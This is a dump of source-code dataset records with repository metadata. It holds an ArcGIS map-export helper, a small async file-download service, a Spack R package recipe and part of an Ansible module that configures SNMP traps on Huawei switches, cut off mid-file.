] | null | null | null | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
] | 9 | 2020-02-03T15:50:10.000Z | 2022-03-02T07:11:34.000Z | CarParkArcGisApi/CarParkArcGisApi/env/Lib/site-packages/arcgis/mapping/_utils.py | moazzamwaheed2017/carparkapi | e52ae1b2aed47321ce9d22ba6cd0b85fa60a417a | [
"MIT"
] | null | null | null | import logging as _logging
import arcgis
_log = _logging.getLogger(__name__)
_use_async = False
def _get_list_value(index, array):
"""
helper operation to loop a list of values regardless of the index value
Example:
>>> a = [111,222,333]
>>> list_loop(15, a)
111
"""
if len(array) == 0:
return None
elif index >= 0 and index < len(array):
return array[index]
return array[index % len(array)]
def export_map(web_map_as_json = None,
format = """PDF""",
layout_template = """MAP_ONLY""",
gis=None):
"""
This function takes the state of the web map(for example, included services, layer visibility
settings, client-side graphics, and so forth) and returns either (a) a page layout or
(b) a map without page surrounds of the specified area of interest in raster or vector format.
The input for this function is a piece of text in JavaScript object notation (JSON) format describing the layers,
graphics, and other settings in the web map. The JSON must be structured according to the WebMap specification
in the ArcGIS HelpThis tool is shipped with ArcGIS Server to support web services for printing, including the
preconfigured service named PrintingTools.
Parameters:
web_map_as_json: Web Map as JSON (str). Required parameter. A JSON representation of the state of the map to be exported as it appears in the web application. See the WebMap specification in the ArcGIS Help to understand how this text should be formatted. The ArcGIS web APIs (for JavaScript, Flex, Silverlight, etc.) allow developers to easily get this JSON string from the map.
format: Format (str). Optional parameter. The format in which the map image for printing will be delivered. The following strings are accepted.For example:PNG8 (default if the parameter is left blank)PDFPNG32JPGGIFEPSSVGSVGZ
Choice list:['PDF', 'PNG32', 'PNG8', 'JPG', 'GIF', 'EPS', 'SVG', 'SVGZ']
layout_template: Layout Template (str). Optional parameter. Either a name of a template from the list or the keyword MAP_ONLY. When MAP_ONLY is chosen or an empty string is passed in, the output map does not contain any page layout surroundings (for example title, legends, scale bar, and so forth)
Choice list:['A3 Landscape', 'A3 Portrait', 'A4 Landscape', 'A4 Portrait', 'Letter ANSI A Landscape', 'Letter ANSI A Portrait', 'Tabloid ANSI B Landscape', 'Tabloid ANSI B Portrait', 'MAP_ONLY']
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_file - Output File as a DataFile
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/ExportWebMapTask.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"web_map_as_json": (str, "Web_Map_as_JSON"),
"format": (str, "Format"),
"layout_template": (str, "Layout_Template"),
"output_file": (DataFile, "Output File"),
}
return_values = [
{"name": "output_file", "display_name": "Output File", "type": DataFile},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Export Web Map Task", kwargs, param_db, return_values, _use_async, url)
export_map.__annotations__ = {
'web_map_as_json': str,
'format': str,
'layout_template': str
}
def get_layout_templates(gis=None):
"""
This function returns the content of the GIS's layout templates formatted as dict.
Parameters:
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_json - layout templates as Python dict
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/GetLayoutTemplatesInfo.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"output_json": (str, "Output JSON"),
}
return_values = [
{"name": "output_json", "display_name": "Output JSON", "type": str},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Get Layout Templates Info Task", kwargs, param_db, return_values, _use_async, url)
get_layout_templates.__annotations__ = {'return': str} | 38.926829 | 383 | 0.7099 | import logging as _logging
import arcgis
_log = _logging.getLogger(__name__)
_use_async = False
def _get_list_value(index, array):
"""
helper operation to loop a list of values regardless of the index value
Example:
>>> a = [111,222,333]
>>> list_loop(15, a)
111
"""
if len(array) == 0:
return None
elif index >= 0 and index < len(array):
return array[index]
return array[index % len(array)]
def export_map(web_map_as_json = None,
format = """PDF""",
layout_template = """MAP_ONLY""",
gis=None):
"""
This function takes the state of the web map(for example, included services, layer visibility
settings, client-side graphics, and so forth) and returns either (a) a page layout or
(b) a map without page surrounds of the specified area of interest in raster or vector format.
The input for this function is a piece of text in JavaScript object notation (JSON) format describing the layers,
graphics, and other settings in the web map. The JSON must be structured according to the WebMap specification
in the ArcGIS HelpThis tool is shipped with ArcGIS Server to support web services for printing, including the
preconfigured service named PrintingTools.
Parameters:
web_map_as_json: Web Map as JSON (str). Required parameter. A JSON representation of the state of the map to be exported as it appears in the web application. See the WebMap specification in the ArcGIS Help to understand how this text should be formatted. The ArcGIS web APIs (for JavaScript, Flex, Silverlight, etc.) allow developers to easily get this JSON string from the map.
format: Format (str). Optional parameter. The format in which the map image for printing will be delivered. The following strings are accepted.For example:PNG8 (default if the parameter is left blank)PDFPNG32JPGGIFEPSSVGSVGZ
Choice list:['PDF', 'PNG32', 'PNG8', 'JPG', 'GIF', 'EPS', 'SVG', 'SVGZ']
layout_template: Layout Template (str). Optional parameter. Either a name of a template from the list or the keyword MAP_ONLY. When MAP_ONLY is chosen or an empty string is passed in, the output map does not contain any page layout surroundings (for example title, legends, scale bar, and so forth)
Choice list:['A3 Landscape', 'A3 Portrait', 'A4 Landscape', 'A4 Portrait', 'Letter ANSI A Landscape', 'Letter ANSI A Portrait', 'Tabloid ANSI B Landscape', 'Tabloid ANSI B Portrait', 'MAP_ONLY']
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_file - Output File as a DataFile
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/ExportWebMapTask.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"web_map_as_json": (str, "Web_Map_as_JSON"),
"format": (str, "Format"),
"layout_template": (str, "Layout_Template"),
"output_file": (DataFile, "Output File"),
}
return_values = [
{"name": "output_file", "display_name": "Output File", "type": DataFile},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Export Web Map Task", kwargs, param_db, return_values, _use_async, url)
export_map.__annotations__ = {
'web_map_as_json': str,
'format': str,
'layout_template': str
}
def get_layout_templates(gis=None):
"""
This function returns the content of the GIS's layout templates formatted as dict.
Parameters:
gis: Optional, the GIS on which this tool runs. If not specified, the active GIS is used.
Returns:
output_json - layout templates as Python dict
See https://utility.arcgisonline.com/arcgis/rest/directories/arcgisoutput/Utilities/PrintingTools_GPServer/Utilities_PrintingTools/GetLayoutTemplatesInfo.htm for additional help.
"""
from arcgis.geoprocessing import DataFile
from arcgis.geoprocessing._support import _execute_gp_tool
kwargs = locals()
param_db = {
"output_json": (str, "Output JSON"),
}
return_values = [
{"name": "output_json", "display_name": "Output JSON", "type": str},
]
if gis is None:
gis = arcgis.env.active_gis
url = gis.properties.helperServices.printTask.url[:-len('/Export%20Web%20Map%20Task')]
return _execute_gp_tool(gis, "Get Layout Templates Info Task", kwargs, param_db, return_values, _use_async, url)
get_layout_templates.__annotations__ = {'return': str} | 0 | 0 | 0 |
4da290692a1a584cea7cacaa0f0a14b29df47e75 | 1,002 | py | Python | scenario3-clustering/docker/clustering/fileService.py | vietzd/qc-cloud-challenges | b239840b9924393f5c5e5939cea291b80e8198c5 | [
"Apache-2.0"
] | 3 | 2020-10-16T07:46:17.000Z | 2021-07-27T12:17:55.000Z | qhana/microservices/clustering/fileService.py | UST-QuAntiL/qhana | bf499d072dcc37f81efec1b8e17b7d5460db7a04 | [
"Apache-2.0"
] | null | null | null | qhana/microservices/clustering/fileService.py | UST-QuAntiL/qhana | bf499d072dcc37f81efec1b8e17b7d5460db7a04 | [
"Apache-2.0"
] | null | null | null | """
Author: Daniel Fink
Email: daniel-fink@outlook.com
"""
import os
import aiohttp
class FileService:
"""
A service class for all kind of file access like downloads,
file deletion, folder deletion, ...
"""
@classmethod
@classmethod
@classmethod
@classmethod | 27.081081 | 72 | 0.653693 | """
Author: Daniel Fink
Email: daniel-fink@outlook.com
"""
import os
import aiohttp
class FileService:
"""
A service class for all kind of file access like downloads,
file deletion, folder deletion, ...
"""
@classmethod
def delete_if_exist(cls, *file_paths):
for file_path in file_paths:
if os.path.exists(file_path):
os.remove(file_path)
@classmethod
def create_folder_if_not_exist(cls, folder_path):
os.makedirs(folder_path, exist_ok=True)
@classmethod
async def fetch_data_as_text(cls, session, url):
async with session.get(url) as response:
return await response.text()
@classmethod
async def download_to_file(cls, url, file_path):
async with aiohttp.ClientSession() as session:
content_as_text = await cls.fetch_data_as_text(session, url)
text_file = open(file_path, 'w')
text_file.write(content_as_text)
text_file.close() | 601 | 0 | 104 |
675143110b25e3987bef5bdf13fdd698811b50f5 | 1,251 | py | Python | var/spack/repos/builtin/packages/r-exactextractr/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/r-exactextractr/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-01-08T08:41:11.000Z | 2022-03-14T19:28:07.000Z | var/spack/repos/builtin/packages/r-exactextractr/package.py | foeroyingur/spack | 5300cbbb2e569190015c72d0970d25425ea38647 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RExactextractr(RPackage):
"""Fast Extraction from Raster Datasets using Polygons
Provides a replacement for the 'extract' function from the 'raster' package
that is suitable for extracting raster values using 'sf' polygons."""
homepage = "https://cloud.r-project.org/package=exactextractr"
url = "https://cloud.r-project.org/src/contrib/exactextractr_0.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/exactextractr"
version('0.5.1', sha256='47ddfb4b9e42e86957e03b1c745d657978d7c4bed12ed3aa053e1bc89f20616d')
version('0.3.0', sha256='c7fb38b38b9dc8b3ca5b8f1f84f4ba3256efd331f2b4636b496d42689ffc3fb0')
version('0.2.1', sha256='d0b998c77c3fd9265a600a0e08e9bf32a2490a06c19df0d0c0dea4b5c9ab5773')
depends_on('r@3.4.0:', type=('build', 'run'))
depends_on('r-rcpp@0.12.12:', type=('build', 'run'))
depends_on('r-raster', type=('build', 'run'))
depends_on('r-sf', type=('build', 'run'))
depends_on('geos@3.5.0:', type=('build', 'run', 'link'))
| 44.678571 | 95 | 0.723421 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RExactextractr(RPackage):
"""Fast Extraction from Raster Datasets using Polygons
Provides a replacement for the 'extract' function from the 'raster' package
that is suitable for extracting raster values using 'sf' polygons."""
homepage = "https://cloud.r-project.org/package=exactextractr"
url = "https://cloud.r-project.org/src/contrib/exactextractr_0.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/exactextractr"
version('0.5.1', sha256='47ddfb4b9e42e86957e03b1c745d657978d7c4bed12ed3aa053e1bc89f20616d')
version('0.3.0', sha256='c7fb38b38b9dc8b3ca5b8f1f84f4ba3256efd331f2b4636b496d42689ffc3fb0')
version('0.2.1', sha256='d0b998c77c3fd9265a600a0e08e9bf32a2490a06c19df0d0c0dea4b5c9ab5773')
depends_on('r@3.4.0:', type=('build', 'run'))
depends_on('r-rcpp@0.12.12:', type=('build', 'run'))
depends_on('r-raster', type=('build', 'run'))
depends_on('r-sf', type=('build', 'run'))
depends_on('geos@3.5.0:', type=('build', 'run', 'link'))
| 0 | 0 | 0 |
101787d79ae009404ae396cdca46beb13ebed6be | 19,566 | py | Python | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | myprojectenv/lib/python3.5/site-packages/ansible/modules/network/cloudengine/ce_snmp_traps.py | lancerenteria/doFlask | 2d4e242469b108c6c8316ee18a540307497bfb53 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_traps
version_added: "2.4"
short_description: Manages SNMP traps configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP traps configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
feature_name:
description:
- Alarm feature name.
required: false
default: null
choices: ['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad', 'devm',
'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down', 'fcoe',
'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6', 'isis',
'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp', 'mpls_lspm',
'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3', 'openflow', 'ospf',
'ospfv3', 'pim', 'pim-std', 'qos', 'radius', 'rm', 'rmon', 'securitytrap',
'smlktrap', 'snmp', 'ssh', 'stackmng', 'sysclock', 'sysom', 'system',
'tcp', 'telnet', 'trill', 'trunk', 'tty', 'vbst', 'vfs', 'virtual-perception',
'vrrp', 'vstm', 'all']
trap_name:
description:
- Alarm trap name.
required: false
default: null
interface_type:
description:
- Interface type.
required: false
default: null
choices: ['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif', '100GE',
'40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']
interface_number:
description:
- Interface number.
required: false
default: null
port_number:
description:
- Source port number.
required: false
default: null
'''
EXAMPLES = '''
- name: CloudEngine snmp traps test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP trap all enable"
ce_snmp_traps:
state: present
feature_name: all
provider: "{{ cli }}"
- name: "Config SNMP trap interface"
ce_snmp_traps:
state: present
interface_type: 40GE
interface_number: 2/0/1
provider: "{{ cli }}"
- name: "Config SNMP trap port"
ce_snmp_traps:
state: present
port_number: 2222
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"feature_name": "all",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {"snmp-agent trap": [],
"undo snmp-agent trap": []}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"snmp-agent trap": ["enable"],
"undo snmp-agent trap": []}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent trap enable"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec, run_commands
class SnmpTraps(object):
""" Manages SNMP trap configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(
argument_spec=self.spec,
required_together=[("interface_type", "interface_number")],
supports_check_mode=True
)
# config
self.cur_cfg = dict()
self.cur_cfg["snmp-agent trap"] = []
self.cur_cfg["undo snmp-agent trap"] = []
# module args
self.state = self.module.params['state']
self.feature_name = self.module.params['feature_name']
self.trap_name = self.module.params['trap_name']
self.interface_type = self.module.params['interface_type']
self.interface_number = self.module.params['interface_number']
self.port_number = self.module.params['port_number']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.existing["snmp-agent trap"] = []
self.existing["undo snmp-agent trap"] = []
self.end_state = dict()
self.end_state["snmp-agent trap"] = []
self.end_state["undo snmp-agent trap"] = []
commands = list()
cmd1 = 'display interface brief'
commands.append(cmd1)
self.interface = run_commands(self.module, commands)
def check_args(self):
""" Check invalid args """
if self.port_number:
if self.port_number.isdigit():
if int(self.port_number) < 1025 or int(self.port_number) > 65535:
self.module.fail_json(
msg='Error: The value of port_number is out of [1025 - 65535].')
else:
self.module.fail_json(
msg='Error: The port_number is not digit.')
if self.interface_type and self.interface_number:
tmp_interface = self.interface_type + self.interface_number
if tmp_interface not in self.interface[0]:
self.module.fail_json(
msg='Error: The interface %s is not in the device.' % tmp_interface)
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.feature_name:
self.proposed["feature_name"] = self.feature_name
if self.trap_name:
self.proposed["trap_name"] = self.trap_name
if self.interface_type:
self.proposed["interface_type"] = self.interface_type
if self.interface_number:
self.proposed["interface_number"] = self.interface_number
if self.port_number:
self.proposed["port_number"] = self.port_number
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_cfg_lower = tmp_cfg.lower()
temp_data = tmp_cfg.split("\n")
temp_data_lower = temp_cfg_lower.split("\n")
for item in temp_data:
if "snmp-agent trap source-port " in item:
if self.port_number:
item_tmp = item.split("snmp-agent trap source-port ")
self.cur_cfg["trap source-port"] = item_tmp[1]
self.existing["trap source-port"] = item_tmp[1]
elif "snmp-agent trap source " in item:
if self.interface_type:
item_tmp = item.split("snmp-agent trap source ")
self.cur_cfg["trap source interface"] = item_tmp[1]
self.existing["trap source interface"] = item_tmp[1]
if self.feature_name:
for item in temp_data_lower:
if item == "snmp-agent trap enable":
self.cur_cfg["snmp-agent trap"].append("enable")
self.existing["snmp-agent trap"].append("enable")
elif item == "snmp-agent trap disable":
self.cur_cfg["snmp-agent trap"].append("disable")
self.existing["snmp-agent trap"].append("disable")
elif "undo snmp-agent trap enable " in item:
item_tmp = item.split("undo snmp-agent trap enable ")
self.cur_cfg[
"undo snmp-agent trap"].append(item_tmp[1])
self.existing[
"undo snmp-agent trap"].append(item_tmp[1])
elif "snmp-agent trap enable " in item:
item_tmp = item.split("snmp-agent trap enable ")
self.cur_cfg["snmp-agent trap"].append(item_tmp[1])
self.existing["snmp-agent trap"].append(item_tmp[1])
else:
del self.existing["snmp-agent trap"]
del self.existing["undo snmp-agent trap"]
def get_end_state(self):
""" Get end_state state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_cfg_lower = tmp_cfg.lower()
temp_data = tmp_cfg.split("\n")
temp_data_lower = temp_cfg_lower.split("\n")
for item in temp_data:
if "snmp-agent trap source-port " in item:
if self.port_number:
item_tmp = item.split("snmp-agent trap source-port ")
self.end_state["trap source-port"] = item_tmp[1]
elif "snmp-agent trap source " in item:
if self.interface_type:
item_tmp = item.split("snmp-agent trap source ")
self.end_state["trap source interface"] = item_tmp[1]
if self.feature_name:
for item in temp_data_lower:
if item == "snmp-agent trap enable":
self.end_state["snmp-agent trap"].append("enable")
elif item == "snmp-agent trap disable":
self.end_state["snmp-agent trap"].append("disable")
elif "undo snmp-agent trap enable " in item:
item_tmp = item.split("undo snmp-agent trap enable ")
self.end_state[
"undo snmp-agent trap"].append(item_tmp[1])
elif "snmp-agent trap enable " in item:
item_tmp = item.split("snmp-agent trap enable ")
self.end_state["snmp-agent trap"].append(item_tmp[1])
else:
del self.end_state["snmp-agent trap"]
del self.end_state["undo snmp-agent trap"]
def cli_load_config(self, commands):
""" Load configure through cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get configure through cli """
regular = "| include snmp | include trap"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_trap_feature_name(self):
""" Set feature name for trap """
if self.feature_name == "all":
cmd = "snmp-agent trap enable"
else:
cmd = "snmp-agent trap enable feature-name %s" % self.feature_name
if self.trap_name:
cmd += " trap-name %s" % self.trap_name
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_feature_name(self):
""" Undo feature name for trap """
if self.feature_name == "all":
cmd = "undo snmp-agent trap enable"
else:
cmd = "undo snmp-agent trap enable feature-name %s" % self.feature_name
if self.trap_name:
cmd += " trap-name %s" % self.trap_name
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def set_trap_source_interface(self):
""" Set source interface for trap """
cmd = "snmp-agent trap source %s %s" % (
self.interface_type, self.interface_number)
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_source_interface(self):
""" Undo source interface for trap """
cmd = "undo snmp-agent trap source"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def set_trap_source_port(self):
""" Set source port for trap """
cmd = "snmp-agent trap source-port %s" % self.port_number
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_trap_source_port(self):
""" Undo source port for trap """
cmd = "undo snmp-agent trap source-port"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" The work function """
self.check_args()
self.get_proposed()
self.get_existing()
find_flag = False
find_undo_flag = False
tmp_interface = None
if self.state == "present":
if self.feature_name:
if self.trap_name:
tmp_cfg = "feature-name %s trap-name %s" % (
self.feature_name, self.trap_name.lower())
else:
tmp_cfg = "feature-name %s" % self.feature_name
find_undo_flag = False
if self.cur_cfg["undo snmp-agent trap"]:
for item in self.cur_cfg["undo snmp-agent trap"]:
if item == tmp_cfg:
find_undo_flag = True
elif tmp_cfg in item:
find_undo_flag = True
elif self.feature_name == "all":
find_undo_flag = True
if find_undo_flag:
self.set_trap_feature_name()
if not find_undo_flag:
find_flag = False
if self.cur_cfg["snmp-agent trap"]:
for item in self.cur_cfg["snmp-agent trap"]:
if item == "enable":
find_flag = True
elif item == tmp_cfg:
find_flag = True
if not find_flag:
self.set_trap_feature_name()
if self.interface_type:
find_flag = False
tmp_interface = self.interface_type + self.interface_number
if "trap source interface" in self.cur_cfg.keys():
if self.cur_cfg["trap source interface"] == tmp_interface:
find_flag = True
if not find_flag:
self.set_trap_source_interface()
if self.port_number:
find_flag = False
if "trap source-port" in self.cur_cfg.keys():
if self.cur_cfg["trap source-port"] == self.port_number:
find_flag = True
if not find_flag:
self.set_trap_source_port()
else:
if self.feature_name:
if self.trap_name:
tmp_cfg = "feature-name %s trap-name %s" % (
self.feature_name, self.trap_name.lower())
else:
tmp_cfg = "feature-name %s" % self.feature_name
find_flag = False
if self.cur_cfg["snmp-agent trap"]:
for item in self.cur_cfg["snmp-agent trap"]:
if item == tmp_cfg:
find_flag = True
elif item == "enable":
find_flag = True
elif tmp_cfg in item:
find_flag = True
else:
find_flag = True
find_undo_flag = False
if self.cur_cfg["undo snmp-agent trap"]:
for item in self.cur_cfg["undo snmp-agent trap"]:
if item == tmp_cfg:
find_undo_flag = True
elif tmp_cfg in item:
find_undo_flag = True
if find_undo_flag:
pass
elif find_flag:
self.undo_trap_feature_name()
if self.interface_type:
if "trap source interface" in self.cur_cfg.keys():
self.undo_trap_source_interface()
if self.port_number:
if "trap source-port" in self.cur_cfg.keys():
self.undo_trap_source_port()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
feature_name=dict(choices=['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad',
'devm', 'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down',
'fcoe', 'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6',
'isis', 'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp',
'mpls_lspm', 'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3',
'openflow', 'ospf', 'ospfv3', 'pim', 'pim-std', 'qos', 'radius',
'rm', 'rmon', 'securitytrap', 'smlktrap', 'snmp', 'ssh', 'stackmng',
'sysclock', 'sysom', 'system', 'tcp', 'telnet', 'trill', 'trunk',
'tty', 'vbst', 'vfs', 'virtual-perception', 'vrrp', 'vstm', 'all']),
trap_name=dict(type='str'),
interface_type=dict(choices=['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif',
'100GE', '40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']),
interface_number=dict(type='str'),
port_number=dict(type='str')
)
argument_spec.update(ce_argument_spec)
module = SnmpTraps(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
| 35.639344 | 104 | 0.533425 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_traps
version_added: "2.4"
short_description: Manages SNMP traps configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP traps configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
feature_name:
description:
- Alarm feature name.
required: false
default: null
choices: ['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad', 'devm',
'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down', 'fcoe',
'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6', 'isis',
'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp', 'mpls_lspm',
'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3', 'openflow', 'ospf',
'ospfv3', 'pim', 'pim-std', 'qos', 'radius', 'rm', 'rmon', 'securitytrap',
'smlktrap', 'snmp', 'ssh', 'stackmng', 'sysclock', 'sysom', 'system',
'tcp', 'telnet', 'trill', 'trunk', 'tty', 'vbst', 'vfs', 'virtual-perception',
'vrrp', 'vstm', 'all']
trap_name:
description:
- Alarm trap name.
required: false
default: null
interface_type:
description:
- Interface type.
required: false
default: null
choices: ['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif', '100GE',
'40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']
interface_number:
description:
- Interface number.
required: false
default: null
port_number:
description:
- Source port number.
required: false
default: null
'''
EXAMPLES = '''
- name: CloudEngine snmp traps test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP trap all enable"
ce_snmp_traps:
state: present
feature_name: all
provider: "{{ cli }}"
- name: "Config SNMP trap interface"
ce_snmp_traps:
state: present
interface_type: 40GE
interface_number: 2/0/1
provider: "{{ cli }}"
- name: "Config SNMP trap port"
ce_snmp_traps:
state: present
port_number: 2222
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"feature_name": "all",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {"snmp-agent trap": [],
"undo snmp-agent trap": []}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"snmp-agent trap": ["enable"],
"undo snmp-agent trap": []}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent trap enable"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec, run_commands
class SnmpTraps(object):
""" Manages SNMP trap configuration """
def __init__(self, **kwargs):
""" Class init """
# module
